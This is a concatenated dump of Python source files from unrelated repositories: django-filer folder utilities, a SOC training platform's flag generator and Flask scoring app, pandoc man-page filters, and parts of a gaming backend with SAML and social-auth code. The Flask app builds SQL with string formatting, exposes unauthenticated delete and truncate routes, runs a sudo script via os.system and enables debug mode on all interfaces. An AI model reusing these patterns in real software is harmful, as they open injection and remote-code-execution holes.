'OrderedFile`s'.format(created_files_count)))
if folders_for_rebuild:
for folder_id in folders_for_rebuild:
call_command('rebuild_order', folder_id=folder_id)
```
#### File: management/commands/rebuild_order.py
```python
from __future__ import unicode_literals, absolute_import
from django.core.management.base import BaseCommand, CommandError
from filer.models import Folder
from filertools.filertools.models import OrderedFile
class Command(BaseCommand):
help = 'Fixes ordering for specified folder or for whole tree'
def __init__(self, stdout=None, stderr=None, no_color=False):
self.rebuilt_folders_count = 0
super(Command, self).__init__(stdout, stderr, no_color)
def add_arguments(self, parser):
parser.add_argument('folder_id', nargs='?', type=int, default=None)
parser.add_argument('with_children', nargs='?',
type=bool, default=True)
def process_folder(self, folder):
ordered_files = OrderedFile.objects.filter(folder_id=folder.id)
        orders = list(range(len(ordered_files)))[::-1]
for ordered_file in ordered_files:
ordered_file.order = orders.pop()
ordered_file.save()
self.rebuilt_folders_count += 1
def traverse_folders_tree(self, folder, with_children):
self.process_folder(folder)
if not with_children:
return
children = folder.children.all()
for child in children:
self.traverse_folders_tree(child, with_children)
return
def handle(self, *args, **options):
if options['folder_id']:
try:
folder = Folder.objects.get(id=options['folder_id'])
except Folder.DoesNotExist:
raise CommandError('Incorrect folder id')
folders = [folder]
else:
folders = Folder.objects.filter(parent=None)
for folder in folders:
self.traverse_folders_tree(folder, options['with_children'])
if self.rebuilt_folders_count:
self.stdout.write(
self.style.SUCCESS(
'Successfully rebuilt {} '
'folders'.format(self.rebuilt_folders_count)))
```
#### File: filertools/filertools/utils.py
```python
from __future__ import unicode_literals, absolute_import
from filer.models import Folder
def copy_filer_folder_structure(source_id=None, final_id=None):
def create_sub_folders_for_folder(folder, destination):
        created_destination = \
            Folder.objects.create(name=folder.name, parent=destination)
for f in folder.children.all():
create_sub_folders_for_folder(f, created_destination)
if not source_id or not final_id:
return
original_root = Folder.objects.get(id=source_id)
destination_root = Folder.objects.get(id=final_id)
for sub_folder in original_root.children.all():
create_sub_folders_for_folder(sub_folder, destination_root)
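# Usage sketch (hypothetical folder ids): replicate the sub-folder tree of
# folder 1 underneath folder 2:
#   copy_filer_folder_structure(source_id=1, final_id=2)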
``` |
{
"source": "0x4F776C/Python-SoC-training-platform",
"score": 2
} |
#### File: code/generator/main.py
```python
from template import *
def main():
for i in range(10):
flag = createFlag()
exec_list = [tcpTraffic, fuzzDataTCP, icmpTraffic, fuzzDataICMP, dnsTraffic, fuzzDataDNS, httpTraffic, fuzzDataHTTP]
exec_me = random.randint(0, 7)
        if exec_me in (1, 3, 5, 7):  # fuzzers take no flag
exec_list[exec_me]()
sleepTimer()
else:
exec_list[exec_me](flag)
addFlagToDB(flag)
sleepTimer()
return None
if __name__ == "__main__":
main()
```
#### File: code/platform/app.py
```python
from flask import *
from flask_mysqldb import *
from MySQLdb import *
import os
app = Flask(__name__)
app.secret_key = "flash message" # Required for flash message to work
app.config["MYSQL_HOST"] = "localhost" # Location/Address of MySQL server
app.config["MYSQL_USER"] = "wss" # MySQL username
app.config["MYSQL_PASSWORD"] = "<PASSWORD>" # MySQL user password
app.config["MYSQL_DB"] = "MP" # The database name
mysql = MySQL(app)
@app.route("/")
def index():
cur = mysql.connection.cursor()
cur.execute("SELECT COUNT(id) FROM MP.tblBlueFlags")
total_score = cur.fetchone()
cur.close()
cur = mysql.connection.cursor()
cur.execute("SELECT sum(solved) FROM MP.tblBlueFlags")
current_score = cur.fetchone()
cur.close()
return render_template("index.html", total_score=total_score[0], current_score=current_score[0])
@app.route("/flags")
def flags():
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM tblBlueFlags")
data = cur.fetchall()
cur.close()
return render_template("flags.html", flags=data)
@app.route("/insert", methods=["POST"])
def insert():
if request.method == "POST":
flag = request.form["flag"]
escape_string_flag = escape_string(flag)
clean_flag = escape_string_flag.decode("utf-8")
cur = mysql.connection.cursor()
cur.execute("SELECT flag from tblBlueFlags WHERE flag='flag{%s}'" % clean_flag)
row_count = cur.rowcount
cur.close()
if row_count == 0:
flash("Flag added successfully")
cur = mysql.connection.cursor()
cur.execute("INSERT INTO tblBlueFlags (flag) VALUES ('flag{%s}')" % clean_flag)
mysql.connection.commit()
return redirect(url_for("flags"))
else:
flash("Flag already exist")
return redirect(url_for("flags"))
@app.route("/delete/<string:id_data>", methods=["POST", "GET"])
def delete(id_data):
input_id = id_data
escape_string_id = escape_string(input_id)
clean_id = escape_string_id.decode("utf-8")
cur = mysql.connection.cursor()
cur.execute("SELECT id from tblBlueFlags WHERE id=%s" % clean_id)
row_count = cur.rowcount
cur.close()
if row_count != 0:
flash("Flag deleted successfully")
input_id = id_data
escape_string_id = escape_string(input_id)
clean_id = escape_string_id.decode("utf-8")
cur = mysql.connection.cursor()
cur.execute("DELETE FROM tblBlueFlags WHERE id=%s" % clean_id)
mysql.connection.commit()
return redirect(url_for("flags"))
else:
flash("Invalid id")
return redirect(url_for("flags"))
@app.route("/check", methods=["POST"])
def check():
if request.method == "POST":
flag = request.form["flag"]
escape_string_flag = escape_string(flag)
clean_flag = escape_string_flag.decode("utf-8")
cur = mysql.connection.cursor()
cur.execute("SELECT flag from tblBlueFlags WHERE flag='flag{%s}'" % clean_flag)
row_count = cur.rowcount
cur.close()
if row_count == 0:
flash("Flag does not exist")
return redirect(url_for("index"))
else:
cur = mysql.connection.cursor()
cur.execute("SELECT solved from tblBlueFlags WHERE flag='flag{%s}'" % clean_flag)
solved_value = cur.fetchone()
cur.close()
if solved_value[0] is None:
flash("Flag submitted")
cur = mysql.connection.cursor()
cur.execute("UPDATE tblBlueFlags SET solved=1 WHERE flag='flag{%s}'" % clean_flag)
mysql.connection.commit()
return redirect(url_for("index"))
elif solved_value[0] == 1:
flash("Flag has already been submitted")
return redirect(url_for("index"))
else:
flash("Unknown error encountered. Contact lecturer")
return redirect(url_for("index"))
@app.route("/donate")
def donate():
return redirect("https://www.blockchain.com/btc/address/37jdCj8dePgU5iy5zp3RtSCFo5XndaxKXe") # Just a simple donation redirection
@app.route("/generate")
def generate():
command = "sudo /home/wss/Desktop/MP/script/generator.sh" # Modify the directory where generator.sh resides
os.system(command)
flash("Generated new flags")
return redirect(url_for("index"))
@app.route("/drop")
def drop():
cur = mysql.connection.cursor()
cur.execute("TRUNCATE TABLE tblBlueFlags")
cur.close()
flash("Deleted all flags")
return redirect(url_for("index"))
if __name__ == "__main__":
app.run(host="0.0.0.0",port=8888,debug=True) # Feel free to change the binding address and port number
``` |
{
"source": "0x53A/sdk",
"score": 2
} |
#### File: manpages/tool/man-pandoc-filter.py
```python
import copy
from pandocfilters import toJSONFilters, Para, Str, Header, Space
def fail_on_includes(key, value, format, meta):
if key == 'Para' and value[0]['c'] == '[!INCLUDE':
assert False, 'Found an unexpected [!INCLUDE'
def promote_and_capitalize_sections(key, value, format, meta):
if key == 'Header':
header_contents = value[2]
header_text = ' '.join([ x['c'] for x in header_contents if x['t'] == 'Str']).lower()
if header_text in ['name', 'synopsis', 'description', 'options', 'examples', 'environment variables']:
# capitalize
for element in header_contents:
if element['t'] == 'Str':
element['c'] = element['c'].upper()
# promote
value = Header(1, value[1], header_contents)
return value
return None
def demote_net_core_1_2(key, value, format, meta):
if key == 'Header':
header_id = value[1][0]
if header_id.startswith('net-core-'):
value = Header(2, value[1], value[2][0]['c'][1])
return value
return None
def main():
toJSONFilters([
fail_on_includes,
promote_and_capitalize_sections,
demote_net_core_1_2,
])
if __name__ == '__main__':
main()
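# Run as a pandoc JSON filter when converting the markdown docs to man pages,
# e.g. (hypothetical file names):
#   pandoc dotnet-build.md -s -t man --filter ./man-pandoc-filter.py -o dotnet-build.1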
```
#### File: manpages/tool/remove-metadata-and-embed-includes.py
```python
import re
import os
import os.path
import sys
def git_root(file):
dirname = os.path.dirname(file)
while True:
if os.path.isdir(os.path.join(dirname, '.git')):
return dirname
dirname = os.path.abspath(os.path.join(dirname, '..'))
if dirname == '/':
assert False, 'at root directory now'
def read_lines_document_file(this_file, original_lines):
result = []
lines = original_lines
# metadata section is optional
if lines[0] == '---' + os.linesep:
# remove first ---
lines = lines[1:]
# find index of second --- and remove that and everything before it
for i in range(len(lines)):
if lines[i] == '---' + os.linesep:
lines = lines[i+1:]
break
for line in lines:
if '[!INCLUDE' in line:
match = re.search(r'\[!INCLUDE *\[[^\]]+\] *\(([^)]+)\)', line)
if match:
relative_path = match.groups()[0]
if relative_path.startswith('~/'):
git_repo_root = git_root(this_file) + '/'
file_to_include = os.path.join(git_repo_root, relative_path[2:])
else:
file_to_include = os.path.join(os.path.dirname(this_file), relative_path)
with open(file_to_include) as f:
lines_to_include = f.readlines()
result.extend(read_lines_document_file(file_to_include, lines_to_include))
else:
assert False, 'Unable to parse: ' + line
else:
result.append(line)
return result
def main(args):
filename = args[1]
with open(filename) as original:
lines = read_lines_document_file(filename, original.readlines())
with open(filename + '.tmp', 'w') as output:
for line in lines:
output.write(line)
os.replace(filename + '.tmp', filename)
if __name__ == '__main__':
sys.exit(main(sys.argv))
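# Invoked with the markdown file to rewrite in place, e.g. (hypothetical path):
#   python remove-metadata-and-embed-includes.py documentation/manpages/sdk/dotnet-build.md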
``` |
{
"source": "0x55AAh/anthill_gaming",
"score": 3
} |
#### File: social/backends/base.py
```python
from anthill.framework.auth.social.core.backends import base
# `module_member` is used in run_pipeline() below; the import path is assumed
# to mirror social_core.utils.module_member in this fork.
from anthill.framework.auth.social.core.utils import module_member
import inspect
# noinspection PyAbstractClass
class BaseAuth(base.BaseAuth):
"""
A authentication backend that authenticates the user based on
the provider response.
"""
async def start(self):
if await self.uses_redirect():
return self.strategy.redirect(self.auth_url())
else:
return self.strategy.html(await self.auth_html())
def auth_complete(self, *args, **kwargs):
"""Completes loging process, must return user instance."""
raise NotImplementedError('Implement in subclass')
def complete(self, *args, **kwargs):
return self.auth_complete(*args, **kwargs)
async def authenticate(self, *args, **kwargs):
"""
Authenticate user using social credentials.
        Authentication is attempted only if this is the correct backend;
        the backend is verified by inspecting kwargs for the presence of
        the current backend name.
"""
# Validate backend and arguments. Require that the Social Auth
# response be passed in as a keyword argument, to make sure we
# don't match the username/password calling conventions of
# authenticate.
if 'backend' not in kwargs or kwargs['backend'].name != self.name or \
'strategy' not in kwargs or 'response' not in kwargs:
return None
self.strategy = kwargs.get('strategy') or self.strategy
self.redirect_uri = kwargs.get('redirect_uri') or self.redirect_uri
self.data = self.strategy.request_data()
kwargs.setdefault('is_new', False)
pipeline = self.strategy.get_pipeline(self)
args, kwargs = self.strategy.clean_authenticate_args(*args, **kwargs)
return await self.pipeline(pipeline, *args, **kwargs)
async def pipeline(self, pipeline, pipeline_index=0, *args, **kwargs):
out = await self.run_pipeline(pipeline, pipeline_index, *args, **kwargs)
if not isinstance(out, dict):
return out
user = out.get('user')
if user:
user.social_user = out.get('social')
user.is_new = out.get('is_new')
return user
async def disconnect(self, *args, **kwargs):
pipeline = self.strategy.get_disconnect_pipeline(self)
kwargs['name'] = self.name
kwargs['user_storage'] = self.strategy.storage.user
return await self.run_pipeline(pipeline, *args, **kwargs)
async def run_pipeline(self, pipeline, pipeline_index=0, *args, **kwargs):
out = kwargs.copy()
out.setdefault('strategy', self.strategy)
out.setdefault('backend', out.pop(self.name, None) or self)
out.setdefault('request', self.strategy.request_data())
out.setdefault('details', {})
if not isinstance(pipeline_index, int) or \
pipeline_index < 0 or pipeline_index >= len(pipeline):
pipeline_index = 0
for idx, name in enumerate(pipeline[pipeline_index:]):
out['pipeline_index'] = pipeline_index + idx
func = module_member(name)
if inspect.iscoroutinefunction(func):
result = await func(*args, **out) or {}
else:
result = func(*args, **out) or {}
if not isinstance(result, dict):
return result
out.update(result)
return out
def get_user(self, user_id):
"""Return user with given ID from the User model used by this backend."""
return self.strategy.get_user(user_id)
async def continue_pipeline(self, partial):
"""Continue previous halted pipeline."""
return await self.strategy.authenticate(
self, pipeline_index=partial.next_step, *partial.args, **partial.kwargs)
```
#### File: core/backends/saml.py
```python
from onelogin.saml2.auth import OneLogin_Saml2_Auth
from onelogin.saml2.settings import OneLogin_Saml2_Settings
from .base import BaseAuth
from ..exceptions import AuthFailed, AuthMissingParameter
# Helpful constants:
OID_COMMON_NAME = "urn:oid:2.5.4.3"
OID_EDU_PERSON_PRINCIPAL_NAME = "urn:oid:1.3.6.1.4.1.5923.1.1.1.6"
OID_EDU_PERSON_ENTITLEMENT = "urn:oid:1.3.6.1.4.1.5923.1.1.1.7"
OID_GIVEN_NAME = "urn:oid:2.5.4.42"
OID_MAIL = "urn:oid:0.9.2342.19200300.100.1.3"
OID_SURNAME = "urn:oid:2.5.4.4"
OID_USERID = "urn:oid:0.9.2342.19200300.100.1.1"
class SAMLIdentityProvider(object):
"""Wrapper around configuration for a SAML Identity provider"""
def __init__(self, name, **kwargs):
"""Load and parse configuration"""
self.name = name
# name should be a slug and must not contain a colon, which
# could conflict with uid prefixing:
assert ':' not in self.name and ' ' not in self.name, \
'IdP "name" should be a slug (short, no spaces)'
self.conf = kwargs
def get_user_permanent_id(self, attributes):
"""
The most important method: Get a permanent, unique identifier
for this user from the attributes supplied by the IdP.
If you want to use the NameID, it's available via
attributes['name_id']
"""
uid = attributes[self.conf.get('attr_user_permanent_id', OID_USERID)]
if isinstance(uid, list):
uid = uid[0]
return uid
# Attributes processing:
def get_user_details(self, attributes):
"""
Given the SAML attributes extracted from the SSO response, get
the user data like name.
"""
return {
'fullname': self.get_attr(attributes, 'attr_full_name',
OID_COMMON_NAME),
'first_name': self.get_attr(attributes, 'attr_first_name',
OID_GIVEN_NAME),
'last_name': self.get_attr(attributes, 'attr_last_name',
OID_SURNAME),
'username': self.get_attr(attributes, 'attr_username',
OID_USERID),
'email': self.get_attr(attributes, 'attr_email',
OID_MAIL),
}
def get_attr(self, attributes, conf_key, default_attribute):
"""
Internal helper method.
Get the attribute 'default_attribute' out of the attributes,
unless self.conf[conf_key] overrides the default by specifying
another attribute to use.
"""
key = self.conf.get(conf_key, default_attribute)
value = attributes[key] if key in attributes else None
if isinstance(value, list):
value = value[0]
return value
@property
def entity_id(self):
"""Get the entity ID for this IdP"""
# Required. e.g. "https://idp.testshib.org/idp/shibboleth"
return self.conf['entity_id']
@property
def sso_url(self):
"""Get the SSO URL for this IdP"""
# Required. e.g.
# "https://idp.testshib.org/idp/profile/SAML2/Redirect/SSO"
return self.conf['url']
@property
def x509cert(self):
"""X.509 Public Key Certificate for this IdP"""
return self.conf['x509cert']
@property
def saml_config_dict(self):
"""Get the IdP configuration dict in the format required by
python-saml"""
return {
'entityId': self.entity_id,
'singleSignOnService': {
'url': self.sso_url,
# python-saml only supports Redirect
'binding': 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect'
},
'x509cert': self.x509cert,
}
class DummySAMLIdentityProvider(SAMLIdentityProvider):
"""
A placeholder IdP used when we must specify something, e.g. when
generating SP metadata.
If OneLogin_Saml2_Auth is modified to not always require IdP
config, this can be removed.
"""
def __init__(self):
super(DummySAMLIdentityProvider, self).__init__(
'dummy',
entity_id='https://dummy.none/saml2',
url='https://dummy.none/SSO',
x509cert=''
)
class SAMLAuth(BaseAuth):
"""
PSA Backend that implements SAML 2.0 Service Provider (SP) functionality.
Unlike all of the other backends, this one can be configured to work with
many identity providers (IdPs). For example, a University that belongs to a
Shibboleth federation may support authentication via ~100 partner
universities. Also, the IdP configuration can be changed at runtime if you
require that functionality - just subclass this and override `get_idp()`.
Several settings are required. Here's an example:
SOCIAL_AUTH_SAML_SP_ENTITY_ID = "https://saml.example.com/"
SOCIAL_AUTH_SAML_SP_PUBLIC_CERT = "... X.509 certificate string ..."
SOCIAL_AUTH_SAML_SP_PRIVATE_KEY = "... private key ..."
SOCIAL_AUTH_SAML_ORG_INFO = {
"en-US": {
"name": "example",
"displayname": "Example Inc.",
"url": "http://example.com"
}
}
SOCIAL_AUTH_SAML_TECHNICAL_CONTACT = {
"givenName": "<NAME>",
"emailAddress": "<EMAIL>"
}
SOCIAL_AUTH_SAML_SUPPORT_CONTACT = {
"givenName": "<NAME>",
"emailAddress": "<EMAIL>"
}
SOCIAL_AUTH_SAML_ENABLED_IDPS = {
"testshib": {
"entity_id": "https://idp.testshib.org/idp/shibboleth",
"url": "https://idp.testshib.org/idp/profile/SAML2/Redirect/SSO",
"x509cert": "MIIEDjCCAvagAwIBAgIBADANBgkqhkiG9w0B...
...8Bbnl+ev0peYzxFyF5sQA==",
}
}
Optional settings:
SOCIAL_AUTH_SAML_SP_EXTRA = {}
SOCIAL_AUTH_SAML_SECURITY_CONFIG = {}
"""
name = "saml"
EXTRA_DATA = []
def get_idp(self, idp_name):
"""Given the name of an IdP, get a SAMLIdentityProvider instance"""
idp_config = self.setting('ENABLED_IDPS')[idp_name]
return SAMLIdentityProvider(idp_name, **idp_config)
def generate_saml_config(self, idp=None):
"""
Generate the configuration required to instantiate OneLogin_Saml2_Auth
"""
# The shared absolute URL that all IdPs redirect back to -
# this is specified in our metadata.xml:
abs_completion_url = self.redirect_uri
config = {
'contactPerson': {
'technical': self.setting('TECHNICAL_CONTACT'),
'support': self.setting('SUPPORT_CONTACT')
},
'debug': True,
'idp': idp.saml_config_dict if idp else {},
'organization': self.setting('ORG_INFO'),
'security': {
'metadataValidUntil': '',
'metadataCacheDuration': 'P10D', # metadata valid for ten days
},
'sp': {
'assertionConsumerService': {
'url': abs_completion_url,
# python-saml only supports HTTP-POST
'binding': 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST'
},
'entityId': self.setting('SP_ENTITY_ID'),
'x509cert': self.setting('SP_PUBLIC_CERT'),
'privateKey': self.setting('SP_PRIVATE_KEY'),
},
'strict': True, # We must force strict mode - for security
}
config["security"].update(self.setting("SECURITY_CONFIG", {}))
config["sp"].update(self.setting("SP_EXTRA", {}))
return config
def generate_metadata_xml(self):
"""
Helper method that can be used from your web app to generate the XML
metadata required to link your web app as a Service Provider.
Returns (metadata XML string, list of errors)
Example usage (Django):
from ..apps.django_app.utils import load_strategy, \
load_backend
def saml_metadata_view(request):
complete_url = reverse('social:complete', args=("saml", ))
saml_backend = load_backend(load_strategy(request), "saml",
complete_url)
metadata, errors = saml_backend.generate_metadata_xml()
if not errors:
return HttpResponse(content=metadata,
content_type='text/xml')
return HttpResponseServerError(content=', '.join(errors))
"""
config = self.generate_saml_config()
saml_settings = OneLogin_Saml2_Settings(
config,
sp_validation_only=True
)
metadata = saml_settings.get_sp_metadata()
errors = saml_settings.validate_metadata(metadata)
return metadata, errors
def _create_saml_auth(self, idp):
"""Get an instance of OneLogin_Saml2_Auth"""
config = self.generate_saml_config(idp)
request_info = {
'https': 'on' if self.strategy.request_is_secure() else 'off',
'http_host': self.strategy.request_host(),
'script_name': self.strategy.request_path(),
'server_port': self.strategy.request_port(),
'get_data': self.strategy.request_get(),
'post_data': self.strategy.request_post(),
}
return OneLogin_Saml2_Auth(request_info, config)
def auth_url(self):
"""Get the URL to which we must redirect in order to
authenticate the user"""
try:
idp_name = self.strategy.request_data()['idp']
except KeyError:
raise AuthMissingParameter(self, 'idp')
auth = self._create_saml_auth(idp=self.get_idp(idp_name))
# Below, return_to sets the RelayState, which can contain
# arbitrary data. We use it to store the specific SAML IdP
# name, since we multiple IdPs share the same auth_complete
# URL.
return auth.login(return_to=idp_name)
def get_user_details(self, response):
"""Get user details like full name, email, etc. from the
response - see auth_complete"""
idp = self.get_idp(response['idp_name'])
return idp.get_user_details(response['attributes'])
def get_user_id(self, details, response):
"""
Get the permanent ID for this user from the response.
We prefix each ID with the name of the IdP so that we can
connect multiple IdPs to this user.
"""
idp = self.get_idp(response['idp_name'])
uid = idp.get_user_permanent_id(response['attributes'])
return '{0}:{1}'.format(idp.name, uid)
def auth_complete(self, *args, **kwargs):
"""
The user has been redirected back from the IdP and we should
now log them in, if everything checks out.
"""
idp_name = self.strategy.request_data()['RelayState']
idp = self.get_idp(idp_name)
auth = self._create_saml_auth(idp)
auth.process_response()
errors = auth.get_errors()
if errors or not auth.is_authenticated():
reason = auth.get_last_error_reason()
raise AuthFailed(
self, 'SAML login failed: {0} ({1})'.format(errors, reason)
)
attributes = auth.get_attributes()
attributes['name_id'] = auth.get_nameid()
self._check_entitlements(idp, attributes)
response = {
'idp_name': idp_name,
'attributes': attributes,
'session_index': auth.get_session_index(),
}
kwargs.update({'response': response, 'backend': self})
return self.strategy.authenticate(*args, **kwargs)
def extra_data(self, user, uid, response, details=None, *args, **kwargs):
return super(SAMLAuth, self).extra_data(user, uid,
response['attributes'],
details=details,
*args, **kwargs)
def _check_entitlements(self, idp, attributes):
"""
Additional verification of a SAML response before
authenticating the user.
Subclasses can override this method if they need custom
validation code, such as requiring the presence of an
eduPersonEntitlement.
raise anthill.framework.auth.social.core.exceptions.AuthForbidden
if the user should not be authenticated, or do nothing
to allow the login pipeline to continue.
"""
pass
```
#### File: rest/handlers/detail.py
```python
from anthill.framework.handlers import RequestHandler, JSONHandlerMixin
from anthill.framework.utils.asynchronous import thread_pool_exec
from anthill.framework.core.exceptions import ImproperlyConfigured
from anthill.framework.http import Http404
from anthill.platform.api.rest.handlers.base import MarshmallowMixin
class SingleObjectMixin:
"""
Provide the ability to retrieve a single object for further manipulation.
"""
model = None
queryset = None
slug_field = 'slug'
slug_url_kwarg = 'slug'
pk_url_kwarg = 'pk'
query_pk_and_slug = False
async def get_object(self, queryset=None):
"""
Return the object the handler is displaying.
Require `self.queryset` and a `pk` or `slug` argument in the url entry.
Subclasses can override this to return any object.
"""
# Use a custom queryset if provided.
if queryset is None:
queryset = self.get_queryset()
# Next, try looking up by primary key.
pk = self.path_kwargs.get(self.pk_url_kwarg)
slug = self.path_kwargs.get(self.slug_url_kwarg)
if pk is not None:
queryset = await thread_pool_exec(queryset.filter_by, pk=pk)
# Next, try looking up by slug.
if slug is not None and (pk is None or self.query_pk_and_slug):
slug_field = self.get_slug_field()
queryset = await thread_pool_exec(queryset.filter_by, **{slug_field: slug})
# If none of those are defined, it's an error.
if pk is None and slug is None:
raise AttributeError(
"Generic detail handler %s must be called with either an object "
"pk or a slug in the url." % self.__class__.__name__)
# Get the single item from the filtered queryset
obj = await thread_pool_exec(queryset.one_or_none)
if obj is None:
raise Http404
return obj
def get_queryset(self):
"""
Return the queryset that will be used to look up the object.
This method is called by the default implementation of get_object() and
may not be called if get_object() is overridden.
"""
if self.queryset is None:
if self.model:
return self.model.query
else:
raise ImproperlyConfigured(
"%(cls)s is missing a queryset. Define "
"%(cls)s.model, %(cls)s.queryset, or override "
"%(cls)s.get_queryset()." % {
'cls': self.__class__.__name__
}
)
return self.queryset
def get_slug_field(self):
"""Get the name of a slug field to be used to look up by slug."""
return self.slug_field
class MarshmallowSingleObjectMixin(MarshmallowMixin):
def get_schema(self):
schema_class = self.get_schema_class()
return schema_class()
def get_schema_class(self):
if self.schema_class is None:
try:
return self.object.__marshmallow__
except AttributeError:
raise ImproperlyConfigured(
"No schema class for dumping data. Either provide a schema_class "
"or define schema on the Model.")
return super().get_schema_class()
class DetailMixin(SingleObjectMixin, MarshmallowSingleObjectMixin, JSONHandlerMixin):
def get_schema_class(self):
if self.schema_class is None:
try:
return self.object.__marshmallow__
except AttributeError:
raise ImproperlyConfigured(
"No schema class for dumping data. Either provide a schema_class "
"or define schema on the Model.")
return self.schema_class
async def get(self, *args, **kwargs):
# noinspection PyAttributeOutsideInit
self.object = await self.get_object()
self.write_json(data=self.serialize(self.object))
class DetailHandler(DetailMixin, RequestHandler):
pass
```
#### File: rest/handlers/list.py
```python
from anthill.platform.api.rest.handlers.base import MarshmallowMixin
from anthill.framework.handlers.base import RequestHandler
from anthill.framework.core.paginator import Paginator
class MultipleObjectMixin:
"""A mixin for handlers manipulating multiple objects."""
allow_empty = True
queryset = None
model = None
paginate_by = None
paginate_orphans = 0
context_object_name = None
paginator_class = Paginator
page_kwarg = 'page'
ordering = None
class MarshmallowMultipleObjectsMixin(MarshmallowMixin):
def get_schema(self):
schema_class = self.get_schema_class()
return schema_class(many=True)
def get_schema_class(self):
if self.schema_class is None:
# TODO
pass
return super().get_schema_class()
class ListMixin(MultipleObjectMixin, MarshmallowMultipleObjectsMixin):
pass
class ListHandler(ListMixin, RequestHandler):
"""A handler for displaying a list of objects."""
```
#### File: platform/atomic/models.py
```python
from anthill.framework.db import db
from anthill.framework.utils import timezone
from anthill.framework.utils.translation import translate_lazy as _
from anthill.platform.atomic.exceptions import (
TransactionError, TransactionTimeoutError, TransactionFinished)
from sqlalchemy_utils.types.uuid import UUIDType
from sqlalchemy_utils.types.choice import ChoiceType
import logging
logger = logging.getLogger('anthill.application')
class Transaction(db.Model):
__tablename__ = 'transactions'
STATUSES = (
('new', _('New')),
('started', _('Started')),
('successful', _('Successful')),
('failed', _('Failed')),
)
id = db.Column(UUIDType(binary=False), primary_key=True)
started = db.Column(db.DateTime, nullable=False, default=timezone.now)
finished = db.Column(db.DateTime)
status = db.Column(ChoiceType(STATUSES), nullable=False, default='new')
timeout = db.Column(db.Integer, nullable=False, default=0)
master = db.Column(db.String(128)) # Name of master service
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._steps = []
self._steps_iterator = None
@property
def is_finished(self):
return self.finished is not None
def check_for_timeout(self):
        # `timeout` is stored in seconds; compare against elapsed wall time
        if not self.is_finished and \
                0 < self.timeout < (timezone.now() - self.started).total_seconds():
raise TransactionTimeoutError
def append(self, step, *args, **kwargs):
self._steps.append([step, args, kwargs])
        self._steps_iterator = iter(self._steps)
async def start(self):
try:
func, args, kwargs = self._steps_iterator.__next__()
return await func(*args, **kwargs)
except StopIteration:
raise TransactionFinished
```
#### File: platform/handlers/base.py
```python
class InternalRequestHandlerMixin:
@property
def internal_request(self):
"""
An alias for `self.application.internal_connection.request
<InternalConnection.request>`.
"""
return self.application.internal_connection.request
```
#### File: anthill/platform/models.py
```python
from anthill.framework.db import db
from sqlalchemy.ext.declarative import declared_attr
class BaseApplication(db.Model):
__abstract__ = True
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
active = db.Column(db.Boolean, nullable=False, default=True)
name = db.Column(db.String(128), nullable=False, unique=True)
@declared_attr
def versions(self):
return db.relationship('ApplicationVersion', backref='application', lazy='dynamic')
@classmethod
def latest_version(cls):
pass
class BaseApplicationVersion(db.Model):
__abstract__ = True
__table_args__ = (
db.UniqueConstraint('value', 'application_id'),
)
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
active = db.Column(db.Boolean, nullable=False, default=True)
value = db.Column(db.String(128), nullable=False)
@declared_attr
def application_id(self):
return db.Column(db.Integer, db.ForeignKey('applications.id'), nullable=False)
@classmethod
def latest(cls):
pass
def __lt__(self, other):
return self.value < other.value
```
#### File: api/v1/public.py
```python
from graphene_sqlalchemy import SQLAlchemyObjectType
from tornado.httpclient import AsyncHTTPClient
from tornado.escape import to_unicode
from anthill.framework.apps import app
from apigw import models
import graphene
import json
class RootQuery(graphene.ObjectType):
"""Api root query."""
request = graphene.JSONString(
service_name=graphene.String(default_value=app.label),
query=graphene.String()
)
@staticmethod
async def resolve_request(root, info, service_name, query):
handler = info.context['handler']
try:
metadata = next(filter(
lambda x: x['name'] == service_name, handler.settings['services_meta']))
except StopIteration:
return {}
else:
data = await AsyncHTTPClient().fetch(
metadata['public_api_url'],
method=handler.request.method,
body=json.dumps({'query': query}),
headers=handler.request.headers
)
return json.loads(to_unicode(data.body))
# noinspection PyTypeChecker
schema = graphene.Schema(query=RootQuery)
```
#### File: anthill_gaming/backup/models.py
```python
from anthill.framework.db import db
from anthill.framework.utils import timezone
from anthill.platform.api.internal import InternalAPIMixin
from sqlalchemy_utils.types import ColorType
class Backup(db.Model):
__tablename__ = 'backups'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
created = db.Column(db.DateTime, default=timezone.now)
group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
recoveries = db.relationship('Recovery', backref='backup', lazy='dynamic')
# TODO: file
class Group(db.Model):
__tablename__ = 'groups'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
active = db.Column(db.Boolean, nullable=False, default=True)
backups = db.relationship('Backup', backref='group', lazy='dynamic')
recoveries = db.relationship('Recovery', backref='group', lazy='dynamic') # TODO: ?
color = db.Column(ColorType)
class Recovery(InternalAPIMixin, db.Model):
__tablename__ = 'recoveries'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
created = db.Column(db.DateTime, default=timezone.now)
group_id = db.Column(db.Integer, db.ForeignKey('groups.id')) # TODO: ?
backup_id = db.Column(db.Integer, db.ForeignKey('backups.id'))
author_id = db.Column(db.Integer, nullable=False)
# TODO:
async def get_author(self):
return await self.internal_request('login', 'get_user', user_id=self.author_id)
```
#### File: anthill_gaming/game_controller/services.py
```python
from anthill.platform.services import PlainService, ControllerRole
from anthill.platform.api.internal import as_internal
class Service(ControllerRole, PlainService):
"""Anthill default service."""
master = 'game_master'
@staticmethod
def setup_internal_api():
@as_internal()
async def heartbeat_report(api, **options):
# TODO:
pass
```
#### File: anthill_gaming/game_master/models.py
```python
from anthill.framework.db import db
from anthill.framework.utils import timezone
from anthill.framework.utils.asynchronous import as_future, thread_pool_exec as future_exec
from anthill.framework.utils.translation import translate_lazy as _
from anthill.platform.models import BaseApplication, BaseApplicationVersion
from anthill.platform.api.internal import InternalAPIMixin, RequestError
from anthill.platform.auth import RemoteUser
from anthill.platform.services import HeartbeatReport
from sqlalchemy_utils.types import URLType, ChoiceType, JSONType
from sqlalchemy.ext.hybrid import hybrid_property
from geoalchemy2.elements import WKTElement
from geoalchemy2 import Geometry
from typing import Union
import geoalchemy2.functions as func
import traceback
import json
class PlayersLimitPerRoomExceeded(Exception):
pass
class UserBannedError(Exception):
pass
class Application(BaseApplication):
__tablename__ = 'applications'
class ApplicationVersion(BaseApplicationVersion):
__tablename__ = 'application_versions'
